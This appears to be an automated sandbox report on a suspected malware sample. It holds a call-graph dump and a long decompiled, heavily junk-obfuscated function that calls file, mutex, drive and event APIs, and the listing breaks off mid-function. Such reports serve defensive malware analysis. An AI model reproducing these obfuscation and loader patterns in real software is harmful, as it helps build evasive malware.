type_info::_Type_info_dtor 66 API calls 7184->7188 7185->7184 7189 408037 7186->7189 7190 40a989 type_info::_Type_info_dtor 66 API calls 7186->7190 7188->7186 7191 408045 7189->7191 7192 40a989 type_info::_Type_info_dtor 66 API calls 7189->7192 7190->7189 7193 408053 7191->7193 7194 40a989 type_info::_Type_info_dtor 66 API calls 7191->7194 7192->7191 7195 408061 7193->7195 7196 40a989 type_info::_Type_info_dtor 66 API calls 7193->7196 7194->7193 7197 40806f 7195->7197 7198 40a989 type_info::_Type_info_dtor 66 API calls 7195->7198 7196->7195 7199 408080 7197->7199 7200 40a989 type_info::_Type_info_dtor 66 API calls 7197->7200 7198->7197 7201 40a28a __lock 66 API calls 7199->7201 7200->7199 7202 408088 7201->7202 7203 408094 InterlockedDecrement 7202->7203 7204 4080ad 7202->7204 7203->7204 7205 40809f 7203->7205 7218 408111 7204->7218 7205->7204 7208 40a989 type_info::_Type_info_dtor 66 API calls 7205->7208 7208->7204 7209 40a28a __lock 66 API calls 7210 4080c1 7209->7210 7211 409228 ___removelocaleref 8 API calls 7210->7211 7217 4080f2 7210->7217 7215 4080d6 7211->7215 7214 40a989 type_info::_Type_info_dtor 66 API calls 7214->7187 7216 409050 ___freetlocinfo 66 API calls 7215->7216 7215->7217 7216->7217 7221 40811d 7217->7221 7224 40a1b0 LeaveCriticalSection 7218->7224 7220 4080ba 7220->7209 7225 40a1b0 LeaveCriticalSection 7221->7225 7223 4080ff 7223->7214 7224->7220 7225->7223 7125 40653e 7128 4063b2 7125->7128 7129 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7128->7129 7130 4063c6 7129->7130 7137 409666 7130->7137 7132 4063d2 7133 4063e6 7132->7133 7141 409523 7132->7141 7135 409666 __forcdecpt_l 101 API calls 7133->7135 7136 4063ef 7135->7136 7138 409684 7137->7138 7139 409674 7137->7139 7146 409551 7138->7146 7139->7132 7142 409531 7141->7142 7143 409543 7141->7143 7142->7132 7168 4094d2 7143->7168 7147 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7146->7147 7148 409566 7147->7148 7149 409572 7148->7149 7150 4095c6 7148->7150 7156 40958a 7149->7156 7158 40c598 7149->7158 7155 4095eb 7150->7155 7165 40c650 7150->7165 7151 409c95 _strcat_s 66 API calls 7154 4095f1 7151->7154 7157 40c050 ___crtLCMapStringA 101 API calls 7154->7157 7155->7151 7155->7154 7156->7139 7157->7156 7159 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7158->7159 7160 40c5ac 7159->7160 7161 40c5b9 7160->7161 7162 40c650 __isleadbyte_l 76 API calls 7160->7162 7161->7156 7163 40c5e1 7162->7163 7164 40c24f ___crtGetStringTypeA 90 API calls 7163->7164 7164->7161 7166 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7165->7166 7167 40c663 7166->7167 7167->7155 7169 40632b _LocaleUpdate::_LocaleUpdate 76 API calls 7168->7169 7170 4094e5 7169->7170 7171 4094ff 7170->7171 7172 40c598 __isctype_l 90 API calls 7170->7172 7171->7132 7172->7171 7226 4085ff 7229 4085dc 7226->7229 7228 40860c moneypunct 7230 4085f0 7229->7230 7231 4085e8 7229->7231 7230->7228 7232 40a989 type_info::_Type_info_dtor 66 API calls 7231->7232 7232->7230

                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                            Function 00403620 Relevance: 55.0, APIs: 17, Strings: 13, Instructions: 2468memoryCOMMONCrypto
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 0 403620-4036af 1 4036b1-4036c6 0->1 2 40371c-403735 call 403180 0->2 3 403705-403716 1->3 4 4036c8-4036fb 1->4 7 403737-40379a 2->7 8 403739-403763 2->8 3->2 4->3 11 4037b1-4037d1 7->11 12 40379c-4037a6 7->12 10 405f63-405f84 8->10 15 4037d3-4037f7 call 4034c0 11->15 16 4037fa-40386f 11->16 13 405ed5-405f3e FindClosePrinterChangeNotification call 4035b0 12->13 14 4037ac 12->14 17 405f43-405f60 call 405f90 13->17 14->17 15->16 19 403875-4038cd GetVersion 16->19 20 405e9a-405ed3 16->20 17->10 23 4038d3-4038dd 19->23 24 403969-40397e 19->24 20->17 27 4038e4-403900 23->27 28 4038df 23->28 26 403980-4039b8 24->26 30 4039bf-4039c9 26->30 31 403902-403909 27->31 32 40390d-40393e call 403570 27->32 28->26 34 403ad8-403b3b 30->34 35 4039cf-403ad3 AreFileApisANSI 30->35 36 403940-403961 31->36 37 40390b 31->37 39 403967 32->39 40 403b42-403f1b 34->40 35->30 36->39 37->39 39->26 40->40 41 403f21-403f70 40->41 42 403f72-403f86 41->42 43 403f88-403fa6 41->43 44 403ffc-404028 42->44 43->44 45 403fa8-403ff7 call 403570 FindFirstPrinterChangeNotification call 403570 43->45 46 40402a-40406b 44->46 47 40406d-4040a2 44->47 45->44 49 4040c9-4040e0 46->49 47->49 50 4040a4-4040c4 call 4035b0 47->50 54 4040f0-40410a call 405fe0 49->54 55 4040e2-4040ec 49->55 50->49 59 404163-404171 54->59 56 40410c-40415d 55->56 57 4040ee 55->57 56->59 57->59 61 404177-404181 59->61 62 404187-404304 61->62 63 404309-4046da QueryPerformanceFrequency 61->63 62->61 63->63 64 4046e0-4046ea 63->64 65 4046f0-404835 64->65 66 40483a-4048b4 64->66 65->64 67 4048b6-4048f8 call 403570 66->67 68 4048fd-40492c 66->68 67->68 70 40499c-4049be 68->70 71 40492e-404996 call 403570 68->71 73 4049c0-404a11 WritePrinter call 405fe0 70->73 74 404a13-404a61 70->74 71->70 73->74 77 405e76-405e97 call 4034c0 74->77 78 404a67-404aac 74->78 77->20 79 404ab2-404bf3 78->79 80 405e4b-405e70 78->80 79->79 83 404bf9-404c17 79->83 80->77 85 404c66-404c9a 83->85 86 404c19-404c64 call 403520 83->86 88 404c9c-404cec GetProcessHeap 85->88 89 404c9e-404caf call 4035e0 85->89 86->85 94 404cf2-404cfc 88->94 95 405d3c-405d6d call 403440 88->95 96 405dd7-405e44 call 405f90 89->96 97 404d03-404d15 94->97 98 404cfe 94->98 100 405d72-405dd2 FindClosePrinterChangeNotification call 403480 95->100 96->80 102 404d17-404d1e 97->102 103 404d6a-404dc1 97->103 98->100 100->96 107 404d20 102->107 108 404d25-404d68 102->108 105 404dc7-404e46 103->105 109 404f00-404f27 FindClosePrinterChangeNotification call 405fe0 105->109 110 404e4c-404e53 105->110 107->105 108->105 114 404f2c-404fc9 CreateEventW 109->114 111 404e55 110->111 112 404e5a-404efe call 403480 110->112 111->114 112->114 117 404fcf-405031 114->117 117->117 118 405033-405078 117->118 119 405cc3-405ce3 118->119 120 40507e-405094 118->120 121 405ce5-405cf0 119->121 122 405cf6-405d3a 119->122 123 405096 120->123 124 405098-4050d0 call 4035e0 120->124 121->122 122->100 126 4050d5-405221 GetLogicalDrives 123->126 124->126 127 405228-405283 CreateFileW 126->127 128 405289-4052d5 127->128 129 405c5d-405c7c 127->129 130 4052d7-4052ea 128->130 131 4052ef-405313 128->131 132 405c93-405cc1 129->132 133 405c7e-405c8d 129->133 134 405c1f-405c5b 130->134 131->134 135 405319-4053a8 CreateFileW 131->135 132->122 133->132 134->132 136 4053b5-4053d5 135->136 137 4053aa-4053b1 135->137 140 4053d7-4053f8 call 403440 136->140 141 4053fb 136->141 138 4053b3 137->138 139 4053fd-40540e 137->139 142 405410-405439 138->142 139->142 140->141 141->142 144 4054a1-4054bf 142->144 145 40543b-40549f 142->145 147 4054d4-40551f GetCurrentProcess 144->147 148 4054c1-4054ce 144->148 145->147 149 405525-405612 CreateMutexW 147->149 150 405bfc-405c1c call 405f90 147->150 148->147 152 405618-405634 149->152 153 405bed-405bf9 149->153 150->134 155 405637-405640 152->155 153->150 156 405646-405a28 CreateFileW IsProcessorFeaturePresent 155->156 157 405a2d-405a4e 155->157 156->155 158 405a54-405a8b 157->158 159 405bc6-405bdc 157->159 161 405ae2-405bc4 158->161 162 405a8d-405adb call 403440 158->162 160 405bde-405be7 159->160 160->153 161->160 162->161
                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                            			E00403620() {
				signed short* _v8;
				signed int _v12;
				signed int _v13;
				short* _v20;
				unsigned int _v24;
				char* _v28;
				long _v32;
				intOrPtr _v36;
				signed short* _v40;
				signed char* _v44;
				signed int _v48;
				signed short* _v52;
				signed short* _v60;
				intOrPtr _v64;
				signed char* _v68;
				intOrPtr _v72;
				signed char* _v76;
				intOrPtr _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed char* _v96;
				void* _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				signed int* _v120;
				signed int _v124;
				signed int _v125;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v144;
				signed short* _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				signed char* _v164;
				signed int _v168;
				signed int _v172;
				intOrPtr _v176;
				signed int _v180;
				int _v184;
				union _LARGE_INTEGER _v196;
				signed int _v200;
				signed int _v201;
				signed int _v208;
				signed int _v212;
				intOrPtr _v220;
				char _v224;
				signed int _v228;
				signed int* _v232;
				signed int _v236;
				signed int _v240;
				signed char* _v248;
				signed int _v252;
				signed int _v256;
				signed int _v257;
				signed int* _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v281;
				signed int _v288;
				intOrPtr* _v292;
				signed int _v293;
				long _v300;
				signed int _v304;
				char _v305;
				signed short _v312;
				void* _v328;
				signed int _v329;
				intOrPtr _v336;
				intOrPtr _v340;
				signed int* _v344;
				signed int _v348;
				int _v352;
				signed int* _v356;
				signed int _v357;
				signed int _v364;
				signed int _v368;
				void* _v372;
				signed int* _v376;
				signed int _v380;
				signed int _v381;
				signed int _v383;
				signed int _v384;
				signed short* _v388;
				signed int _v392;
				signed int* _v396;
				void* _v400;
				void* _v404;
				signed int _v408;
				char _v409;
				intOrPtr _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				void* _v428;
				signed int _v432;
				signed int _v433;
				intOrPtr _v440;
				signed short _v444;
				signed char* _v448;
				signed int _v452;
				signed int _v456;
				signed int* _v460;
				signed int _v461;
				signed int _v468;
				void* _v472;
				signed short* _v476;
				unsigned int _v480;
				intOrPtr _v772;
				signed int _v776;
				char* _v780;
				signed int _v784;
				signed int _v788;
				signed int _v792;
				char _v796;
				signed int _v800;
				signed int _v804;
				signed int _v808;
				char _v812;
				char _v816;
				signed int _v820;
				char _v824;
				signed short _t1682;
				signed int _t1697;
				long _t1732;
				signed char* _t1852;
				signed short* _t1884;
				signed int _t1918;
				signed short** _t1921;
				intOrPtr _t1993;
				intOrPtr _t2022;
				signed char* _t2338;
				signed char* _t2421;
				signed int _t2429;
				signed short* _t2433;
				signed int _t2816;
				signed int _t2825;
				signed char* _t2911;
				void* _t3173;

				_v201 = 0x41;
				_v364 = 0x5953;
				_v468 = 0x5a9;
				_v76 =  &_v201;
				_v236 = 0xbdd;
				_v357 = 0x44;
				_v452 = _v468;
				_v88 = _v236;
				_v64 = 0xa27b;
				_v212 = _v364;
				_v344 =  &_v212;
				if( *_v344 + _v364 != _v212) {
					if(_v468 - 0x653 < _v452) {
						_v240 = 0xf37e;
						_v44 =  &_v357;
						_v172 = _v88;
						_v416 = 0x4790;
						_v257 =  *_v76;
						_v772 = 0x11c;
					}
					 *0x414004 = _v452 * _v468; // executed
				}
				E00403180(); // executed
				_v784 = _v88 & 0x0000ffff;
				if(_v784 == 0x969) {
					 *_v344 =  *_v344 >> _v364;
					_v240 = _v240 ^ 0x000030aa;
					L123:
					_v452 = _v468 &  *0x414004;
					return _v776;
				}
				_v476 =  &_v88;
				_v424 = 0xd0e2;
				_v68 =  &_v357;
				_v788 = _v364;
				if(_v788 == 0x5953) {
					_v60 =  &_v172;
					if(( *_v44 & 0x000000ff & _v357 & 0x000000ff) < ( *_v68 & 0x000000ff)) {
						E004034C0(_v468 & 0x0000ffff, _v468 & 0x0000ffff, _v257 & 0x000000ff, _v240);
						_t3173 = _t3173 + 0x10;
					}
					_v256 = _v240;
					_v776 =  *_v344;
					_v40 = 0x414004;
					_v164 =  &_v201;
					_v236 = ( *_v60 & 0x0000ffff) * ( *_v476 & 0x0000ffff);
					_v336 = 0xbe43;
					_v384 =  *_v68;
					_v120 =  &_v256;
					if( *_v120 + _v256 < _v240) {
						L120:
						 *_v344 = _v212 - _v364;
						_v212 =  *_v344 + _v776;
						_v240 =  *_v120 - _v256;
						goto L122;
					}
					_v168 =  *_v344;
					_v300 = GetVersion();
					_v388 =  &_v88;
					_v13 = _v384;
					_v168 =  *_v344 >> _v776;
					_v792 = _v256;
					if(_v792 == 0xb150) {
						 *_v76 =  *_v164 - _v201;
					} else {
						if(_v792 == 0xf37e) {
							_v232 =  &_v256;
							_v796 = _v13;
							if(_v796 == 0x16) {
								E00403570();
								_v364 =  *_v344 ^ _v776;
								 *_v344 =  *_v344 << _v168;
							} else {
								if(_v796 == 0xfd) {
									_v172 = _v236 & 0x0000ffff | _v88 & 0x0000ffff;
									_v384 = _v13 & 0x000000ff & _v357 & 0x000000ff;
								}
							}
						}
					}
					_v272 = _v468;
					_v24 = _v240;
					_v84 = _v212;
					_v357 = ( *_v44 & 0x000000ff) + ( *_v68 & 0x000000ff);
					_v156 = _v88;
					while(_v424 < 0xe58c) {
						 *_v120 = _v24 +  *_v232;
						_v168 = _v212 - _v84;
						 *_v344 =  *_v344 & _v84;
						_v240 =  *_v232 + _v24;
						_v13 = (_v384 & 0x000000ff) - (_v357 & 0x000000ff);
						_v352 = AreFileApisANSI();
						_v156 = ( *_v476 & 0x0000ffff) - (_v236 & 0x0000ffff);
						_v212 = _v776 + _v84;
						_v212 =  *_v344 << _v84;
						_v256 =  *_v232 >>  *_v120;
						 *0x414004 = _v272 | _v452;
						_v424 = _v424 + 0x73;
						 *_v344 =  *_v344 ^ _v364;
						_v272 = _v468 &  *0x414004;
					}
					_v281 =  *_v76;
					_v13 = ( *_v68 & 0x000000ff) * (_v357 & 0x000000ff);
					_v176 = 0xac40;
					 *_v476 = ( *_v388 & 0x0000ffff) + ( *_v60 & 0x0000ffff);
					_v376 =  &_v256;
					_v108 = _v84;
					_v236 = (_v172 & 0x0000ffff) - ( *_v60 & 0x0000ffff);
					do {
						_v357 = ( *_v68 & 0x000000ff) - (_v384 & 0x000000ff);
						_v256 =  *_v232 + _v24;
						_v84 = _v168 +  *_v344;
						 *_v344 =  *_v344 & _v212;
						 *_v232 =  *_v120 -  *_v376;
						 *_v476 = ( *_v476 & 0x0000ffff) + ( *_v60 & 0x0000ffff);
						 *_v44 = (_v13 & 0x000000ff) - ( *_v68 & 0x000000ff);
						_v168 =  *_v344 ^ _v84;
						 *0x414004 = _v452 >>  *_v40;
						_v468 =  *_v40 | _v452;
						 *_v164 =  *_v76 << _v281;
						_v156 = _v172 & 0x0000ffff & _v88 & 0x0000ffff;
						 *_v44 = ( *_v44 & 0x000000ff) - (_v13 & 0x000000ff);
						_v240 =  *_v232 +  *_v120;
						 *_v232 = _v240 + _v256;
						_v776 = _v364 - _v168;
						_v108 =  *_v344 - _v212;
						 *0x414004 =  *_v40 + _v272;
						_v357 = _v13 & 0x000000ff & _v384 & 0x000000ff;
						 *_v60 = ( *_v388 & 0x0000ffff) - (_v236 & 0x0000ffff);
						 *_v232 =  *_v120 |  *_v376;
						_v84 =  *_v344 << _v776;
						_v776 = _v364 ^  *_v344;
						_v336 = _v336 + 0xd1;
						_v256 = _v240 >>  *_v120;
						 *_v44 = (_v384 & 0x000000ff) + (_v13 & 0x000000ff);
						 *_v60 = _v172 & 0x0000ffff & _v88 & 0x0000ffff;
						 *_v40 =  *_v40 + _v468;
						 *0x414004 = _v452 -  *_v40;
						_v240 = _v24 - _v256;
						_v776 = _v108 + _v168;
						_v236 = ( *_v476 & 0x0000ffff) - (_v88 & 0x0000ffff);
						_v357 = (_v13 & 0x000000ff) + ( *_v44 & 0x000000ff);
						_v84 = _v212 -  *_v344;
						_v24 =  *_v376 &  *_v232;
						_v108 =  *_v344 | _v364;
						_v84 = _v776 >>  *_v344;
						 *0x414004 = _v468 ^  *_v40;
						 *_v68 = ( *_v68 & 0x000000ff) << (_v357 & 0x000000ff);
						_v240 =  *_v232 +  *_v376;
						_v776 =  *_v344 - _v168;
						_v776 =  *_v344 & _v108;
						_v212 = _v364 +  *_v344;
						_v84 =  *_v344 + _v776;
						 *_v40 =  *_v40 -  *0x414004;
						_v257 = _v281 - _v201;
						 *0x414004 = _v468 +  *_v40;
						 *_v60 = (_v236 & 0x0000ffff) + (_v156 & 0x0000ffff);
						_v240 =  *_v120 - _v256;
						_v240 = _v256 -  *_v120;
					} while (_v336 < 0xdc78);
					_v293 =  *_v44;
					_v340 = 0x7364;
					_v88 = _v236 & 0x0000ffff | _v172 & 0x0000ffff;
					if((_v156 & 0x0000ffff) << ( *_v476 & 0x0000ffff) >= (_v236 & 0x0000ffff ^  *_v388 & 0x0000ffff)) {
						asm("cdq");
						if(( *_v44 & 0x000000ff) >> (_v357 & 0x000000ff) == ( *_v68 & 0x000000ff) / (_v13 & 0x000000ff)) {
							_v240 = _v256 + _v24;
							E00403570();
							_v776 =  *_v344 - _v108;
							_push( &_v384);
							_push(0x65);
							_push(0x22);
							_t1993 = _v80;
							_push(_t1993);
							L0040603C();
							_v116 = _t1993;
							 *_v344 =  *_v344 & _v84;
							E00403570();
						}
					} else {
						_v212 =  *_v344 & _v776;
					}
					_v160 = 0x6112;
					if(_v452 + _v272 != _v468 +  *0x414004) {
						_v364 = _v168 >> _v212;
						if(( *_v68 & 0x000000ff) << ( *_v44 & 0x000000ff) >= (_v384 & 0x000000ff) * (_v357 & 0x000000ff)) {
							_v201 =  *_v76 + _v281;
							E004035B0( *_v68, _v256);
						}
					} else {
						_v293 = ( *_v68 & 0x000000ff) + ( *_v44 & 0x000000ff);
						_v236 =  *_v476 & 0x0000ffff ^ _v156 & 0x0000ffff;
						 *_v376 = _v240 | _v256;
					}
					_v800 = _v272;
					if(_v800 == 0x4eb) {
						 *_v40 =  *_v40 - _v272;
						E00405FE0();
					} else {
						if(_v800 == 0x5a9) {
							_v329 = _v293;
							_v88 = ( *_v476 & 0x0000ffff) + (_v172 & 0x0000ffff);
							 *0x437b84 = _v212;
							_v132 = _v240;
							_v364 = _v168 & _v108;
							_v776 = _v108 -  *_v344;
						}
					}
					_v252 =  *_v120;
					_v460 =  &_v84;
					while(_v160 != 0x6ff1) {
						 *_v68 = ( *_v68 & 0x000000ff) + ( *_v44 & 0x000000ff);
						_v160 = _v160 + 0x2f;
						_v156 = ( *_v388 & 0x0000ffff) + ( *_v60 & 0x0000ffff);
						_v212 =  *_v460 - _v776;
						 *0x414004 = _v468 | _v272;
						_v776 =  *_v460 ^ _v108;
						 *_v344 = _v776 <<  *_v460;
						 *_v68 = (_v384 & 0x000000ff) >> ( *_v44 & 0x000000ff);
						_v236 =  *_v476 & 0x0000ffff &  *_v388 & 0x0000ffff;
						_v452 = _v272 -  *_v40;
						_v201 =  *_v164 +  *_v76;
						_v24 = _v252 + _v240;
						 *_v344 =  *_v344 -  *_v460;
						 *_v476 = ( *_v388 & 0x0000ffff) - (_v156 & 0x0000ffff);
						_v357 =  *_v68 & 0x000000ff & _v329 & 0x000000ff;
						_v240 = _v252 +  *_v376;
						_v212 =  *_v344 -  *_v460;
						_v776 = _v212 + _v168;
					}
					do {
						_v256 =  *_v120 >> _v132;
						_v172 = _v236 & 0x0000ffff | _v156 & 0x0000ffff;
						 *_v44 =  *_v44 & 0x000000ff ^ _v357 & 0x000000ff;
						_v84 =  *_v460 << _v776;
						 *0x437b84 = _v364 & _v108;
						_v256 = _v24 +  *_v120;
						_v212 = _v776 -  *_v344;
						_v84 =  *_v344 + _v168;
						_v201 = _v257 - _v281;
						 *_v40 = _v452 - _v468;
						_v329 = (_v13 & 0x000000ff) + (_v293 & 0x000000ff);
						_v88 =  *_v60 & 0x0000ffff & _v156 & 0x0000ffff;
						_v240 = _v252 - _v256;
						 *0x437b84 = _v108 << _v84;
						_v88 = _v156 & 0x0000ffff ^  *_v388 & 0x0000ffff;
						_v384 = _v329 & 0x000000ff | _v293 & 0x000000ff;
						_v256 =  *_v120 >> _v252;
						_v108 = _v212 +  *_v460;
						_v212 =  *_v344 &  *_v460;
						_v256 = _v252 -  *_v120;
						 *_v476 = ( *_v60 & 0x0000ffff) + ( *_v388 & 0x0000ffff);
						_v357 = ( *_v68 & 0x000000ff) + ( *_v44 & 0x000000ff);
						 *0x437b84 =  *_v344 +  *_v460;
						_v212 =  *_v460 - _v84;
						_v257 =  *_v164 +  *_v76;
						 *_v40 = _v468 - _v452;
						 *_v60 = _v156 & 0x0000ffff & _v172 & 0x0000ffff;
						QueryPerformanceFrequency( &_v196);
						_v64 = _v64 - 0x10;
						_v384 = _v329 & 0x000000ff ^ _v13 & 0x000000ff;
						_v252 = _v240 >> _v132;
						_v132 =  *_v232 | _v252;
						 *_v344 = _v776 << _v84;
						 *0x437b84 =  *_v344 - _v84;
						_v776 = _v108 -  *_v460;
						 *_v476 = _v236 & 0x0000ffff & _v156 & 0x0000ffff;
						_v293 = ( *_v68 & 0x000000ff) + ( *_v44 & 0x000000ff);
						 *_v120 =  *_v376 + _v256;
						 *_v460 = _v168 + _v108;
						_v212 =  *_v460 - _v108;
						 *_v120 =  *_v376 - _v252;
						_v156 = (_v172 & 0x0000ffff) - ( *_v60 & 0x0000ffff);
						_v13 = (_v329 & 0x000000ff) + (_v357 & 0x000000ff);
						 *0x414004 =  *_v40 - _v452;
						_v281 = _v201 ^ _v257;
						 *_v376 =  *_v120 |  *_v232;
						_v364 = _v108 << _v84;
						_v357 = (_v329 & 0x000000ff) >> ( *_v44 & 0x000000ff);
						 *_v476 =  *_v476 & 0x0000ffff &  *_v60 & 0x0000ffff;
						_v84 = _v168 - _v364;
						 *_v120 =  *_v120 +  *_v376;
					} while (_v64 > 0xa1cb);
					while(_v416 <= 0x54aa) {
						_v212 =  *_v344 &  *_v460;
						 *0x437b84 =  *_v344 -  *_v460;
						_v236 = (_v88 & 0x0000ffff) - (_v156 & 0x0000ffff);
						 *_v68 = ( *_v44 & 0x000000ff) + (_v357 & 0x000000ff);
						_v416 = _v416 + 0x2b;
						_v132 = _v240 + _v252;
						_v364 = _v108 + _v776;
						_v364 = _v84 <<  *_v460;
						_v84 =  *_v344 >> _v108;
						_v212 = _v364 |  *_v344;
						_v272 =  *_v40 ^ _v468;
						 *_v164 =  *_v76 & _v257;
						_v236 = ( *_v476 & 0x0000ffff) + (_v88 & 0x0000ffff);
						 *_v44 = ( *_v68 & 0x000000ff) + (_v13 & 0x000000ff);
						_v252 =  *_v376 -  *_v120;
						_v256 =  *_v120 + _v132;
						_v236 =  *_v476 & 0x0000ffff & _v172 & 0x0000ffff;
					}
					_v96 =  &_v329;
					_v212 = _v776 *  *_v344;
					_v112 = _v240;
					 *0x436b88 = ( *_v476 & 0x0000ffff) + (_v156 & 0x0000ffff);
					_v364 =  *_v460 -  *_v344;
					if(_v281 -  *_v164 < _v201 - _v257) {
						_v168 =  *_v344 >> _v776;
						_v156 = _v172 & 0x0000ffff ^  *0x436b88 & 0x0000ffff;
						_v293 = (_v384 & 0x000000ff) << ( *_v68 & 0x000000ff);
						E00403570();
					}
					_v348 =  *_v376;
					if((_v468 |  *_v40) < (_v452 & _v272)) {
						 *_v460 =  *_v344 + _v84;
						_v452 =  *_v40 + _v468;
						_v281 = _v201 -  *_v164;
						E00403570();
						 *0x436b88 = (_v88 & 0x0000ffff) + (_v236 & 0x0000ffff);
						_v357 = (_v384 & 0x000000ff) - ( *_v96 & 0x000000ff);
					}
					if( *_v40 * _v452 >= (_v272 & _v468)) {
						_push( &_v144);
						_push(0xf5);
						_t1921 =  &_v476;
						_push(_t1921);
						_push(_v80);
						L0040602A();
						_v144 = _t1921;
						 *_v232 =  *_v376 + _v252;
						E00405FE0();
						 *_v344 = _v776 -  *_v460;
					}
					_v364 =  *_v344 - _v168;
					_v252 =  *_v120 >>  *_v376;
					if(( *_v60 & 0x0000ffff ^  *_v388 & 0x0000ffff) < ( *_v476 & 0x0000ffff) << (_v172 & 0x0000ffff)) {
						L119:
						E004034C0(_v272 & 0x0000ffff,  *_v40 & 0x0000ffff,  *_v76 & 0x000000ff,  *_v120);
						_t3173 = _t3173 + 0x10;
						goto L120;
					} else {
						_v124 =  *_v460;
						_v156 =  *_v476 & 0x0000ffff |  *_v60 & 0x0000ffff;
						if( *_v40 *  *0x414004 == (_v272 & _v452)) {
							L118:
							_v384 = (_v329 & 0x000000ff) - ( *_v44 & 0x000000ff);
							 *0x437b84 =  *_v344 -  *_v460;
							goto L119;
						} else {
							goto L55;
						}
						do {
							L55:
							_v340 = _v340 + 0xb8;
							_v24 =  *_v376 + _v348;
							_v108 = _v776 + _v212;
							_v84 =  *_v460 +  *_v344;
							_v156 = ( *_v60 & 0x0000ffff) + ( *_v388 & 0x0000ffff);
							 *_v96 = _v329 & 0x000000ff &  *_v68 & 0x000000ff;
							 *_v40 =  *_v40 -  *0x414004;
							_v201 = _v281 >>  *_v164;
							_v240 = _v252 ^ _v24;
							 *0x437b84 = _v84 << _v108;
							_v357 = _v13 & 0x000000ff |  *_v68 & 0x000000ff;
							_v156 = (_v236 & 0x0000ffff) - (_v88 & 0x0000ffff);
							 *_v120 = _v24 & _v252;
							_v364 =  *_v460 + _v124;
							_t2816 =  *0x437b84; // 0x1c000000
							_v108 = _t2816 +  *_v460;
							_v348 = _v256 - _v24;
							_v88 = ( *_v388 & 0x0000ffff) + ( *_v476 & 0x0000ffff);
						} while (_v340 <= 0x969c);
						if((_v13 & 0x000000ff) - (_v293 & 0x000000ff) != ( *_v68 & 0x000000ff) + (_v384 & 0x000000ff)) {
							_v329 = ( *_v44 & 0x000000ff) - ( *_v68 & 0x000000ff);
							_t1918 =  *0x437b84; // 0x1c000000
							E00403520(_v776, _v108, _t1918,  *_v344, _v776);
							 *_v344 = _v84 &  *_v460;
						}
						_v408 =  *_v344;
						 *_v232 = _v348 ^  *_v120;
						_v804 = _v132;
						if(_v804 == 0x2e23) {
							E004035E0(_v240, _v212);
							goto L117;
						} else {
							_v472 = GetProcessHeap();
							_v236 = ( *0x436b88 & 0x0000ffff) + ( *_v388 & 0x0000ffff);
							_v808 = _v84;
							if(_v808 == 0x5181) {
								_v172 = ( *_v60 & 0x0000ffff) - (_v236 & 0x0000ffff);
								_v13 = (_v384 & 0x000000ff) - ( *_v96 & 0x000000ff);
								E00403440(_v172, _v24);
							} else {
								if(_v808 == 0x1c000000) {
									_v812 =  *_v76;
									if(_v812 == 0) {
										_v381 =  *_v68;
										 *0x414006 = _v281 >>  *_v76;
										_v236 = ( *_v476 & 0x0000ffff) << (_v172 & 0x0000ffff);
										_v380 =  *_v344;
										_v212 =  *_v460 |  *_v344;
									} else {
										if(_v812 == 0x71) {
											 *_v120 = _v240 - _v112;
											_v124 = _v776 +  *_v344;
											 *_v460 =  *_v344 + _v108;
											_v256 =  *_v232 + _v112;
										}
									}
									_v52 =  &_v468;
									_v257 = _v281 ^ _v201;
									_v432 = _v172;
									_v329 = (_v357 & 0x000000ff) * ( *_v68 & 0x000000ff);
									_v480 = _v24;
									_v24 = _v240 &  *_v232;
									_t1697 = _v124 - _v380;
									_v364 = _t1697;
									_v816 = _v381;
									if(_v816 == 0x2f) {
										_push(_v36);
										L00406036();
										_v420 = _t1697;
										 *_v232 =  *_v232 |  *_v376;
										E00405FE0();
									} else {
										if(_v816 == 0xf3) {
											_v212 =  *_v344 - _v364;
											E00403480(_v432 & 0x0000ffff, _v272 & 0x0000ffff, _v468 & 0x0000ffff);
											_v212 =  *_v344 &  *_v460;
											 *_v44 = (_v357 & 0x000000ff) + (_v13 & 0x000000ff);
											_v156 = ( *_v388 & 0x0000ffff) - ( *_v476 & 0x0000ffff);
											_v240 =  *_v120 -  *_v376;
											_v84 = _v108 + _v408;
											_v124 =  *_v460 + _v364;
										}
									}
									_v248 =  &_v13;
									_v172 = ( *0x436b88 & 0x0000ffff) >> (_v432 & 0x0000ffff);
									_v304 = _v468;
									_v448 =  &_v281;
									_v400 = CreateEventW(0, 0, 0, 0);
									_v256 =  *_v376 <<  *_v120;
									_v48 = _v84;
									_v13 = _v293 & 0x000000ff ^ _v381 & 0x000000ff;
									 *_v476 = _v236 & 0x0000ffff &  *0x436b88 & 0x0000ffff;
									_v368 =  *_v460;
									do {
										_v176 = _v176 + 0xb5;
										 *_v232 = _v132 - _v24;
										_v364 =  *_v460 +  *_v344;
										_v108 = _v368 + _v168;
										_v384 = (_v381 & 0x000000ff) + (_v13 & 0x000000ff);
									} while (_v176 <= 0xe9c3);
									_v136 = 0xabb7a47c;
									_v156 =  *_v60 & 0x0000ffff &  *_v476 & 0x0000ffff;
									if( *_v76 - _v257 <  *_v164 - _v281) {
										if( *_v52 +  *_v40 <= _v272 - _v304) {
											_v776 =  *_v460 | _v108;
										}
										L114:
										_v240 =  *_v232 >>  *_v376;
										 *_v460 =  *_v344 << _v408;
										 *0x437b84 = _v408 ^  *_v460;
										L116:
										_v293 = _v13 & 0x000000ff &  *_v68 & 0x000000ff;
										_t1682 = _v468 - _v452;
										 *0x414004 = _t1682;
										_push(_v72);
										L00406036();
										_v444 = _t1682;
										 *_v344 =  *_v460 + _v124;
										E00403480(_v156 & 0x0000ffff,  *_v40 & 0x0000ffff,  *_v40 & 0x0000ffff);
										L117:
										_t2825 =  *0x437b84; // 0x1c000000
										_v168 = _t2825 << _v84;
										_v108 =  *_v344 >>  *_v460;
										 *_v164 =  *_v76 | _v201;
